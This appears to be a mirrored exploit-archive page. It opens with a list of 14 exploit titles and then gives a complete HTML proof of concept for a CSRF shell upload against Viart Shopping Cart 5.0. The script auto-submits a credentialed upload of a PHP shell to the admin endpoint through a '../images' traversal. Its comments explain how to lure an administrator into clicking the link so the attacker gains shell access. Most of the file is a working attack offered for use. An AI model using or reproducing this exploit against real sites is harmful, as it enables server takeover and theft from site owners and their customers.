264d15855e
14 new exploits FRticket Ticket System - Stored XSS Viart Shopping Cart 5.0 - CSRF Shell Upload Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass Dream Gallery 2.0 - Admin Panel Authentication Bypass Grid Gallery 1.0 - Admin Panel Authentication Bypass Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC iSQL 1.0 - Shell Command Injection iSQL 1.0 - isql_main.c Buffer Overflow PoC Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption
57 lines
1.9 KiB
HTML
Executable file
57 lines
1.9 KiB
HTML
Executable file
<!--
|
|
# Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability
|
|
# Date : 2016/06/12
|
|
# Google Dork : Script-Kiddie ;)
|
|
# Exploit Author : Ali Ghanbari
|
|
# Vendor Homepage : http://www.viart.com/
|
|
# Software Link : http://www.viart.com/php_shopping_cart_free_evaluation_download.html
|
|
# Version : 5.0
|
|
|
|
|
|
#POC
|
|
-->
|
|
|
|
<html>
|
|
<body onload="submitRequest();">
|
|
<script>
|
|
function submitRequest()
|
|
{
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true);
|
|
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
|
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
|
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
|
|
xhr.withCredentials = "true";
|
|
var body = "-----------------------------256672629917035\r\n" +
|
|
"Content-Disposition: form-data; name=\"dir_root\"\r\n" +
|
|
"\r\n" +
|
|
"../images\r\n" +
|
|
"-----------------------------256672629917035\r\n" +
|
|
"Content-Disposition: form-data; name=\"newfile_0\"; filename=\"[shell.php]\"\r\n" +
|
|
"Content-Type: application/x-php\r\n" +
|
|
"\r\n" +
|
|
"\r\n" +
|
|
"-----------------------------256672629917035--\r\n";
|
|
var aBody = new Uint8Array(body.length);
|
|
for (var i = 0; i < aBody.length; i++)
|
|
aBody[i] = body.charCodeAt(i);
|
|
xhr.send(new Blob([aBody]));
|
|
}
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
<!--
|
|
#Desc:
|
|
|
|
upload exploit code in your host and send link to admin when admin click on link, you can
|
|
access to your shell from below path :
|
|
|
|
http://localhost/images/[your shell]
|
|
|
|
####################################
|
|
|
|
[+]Exploit by: Ali Ghanbari
|
|
|
|
[+]My Telegram :@Exploiter007
|
|
-->
|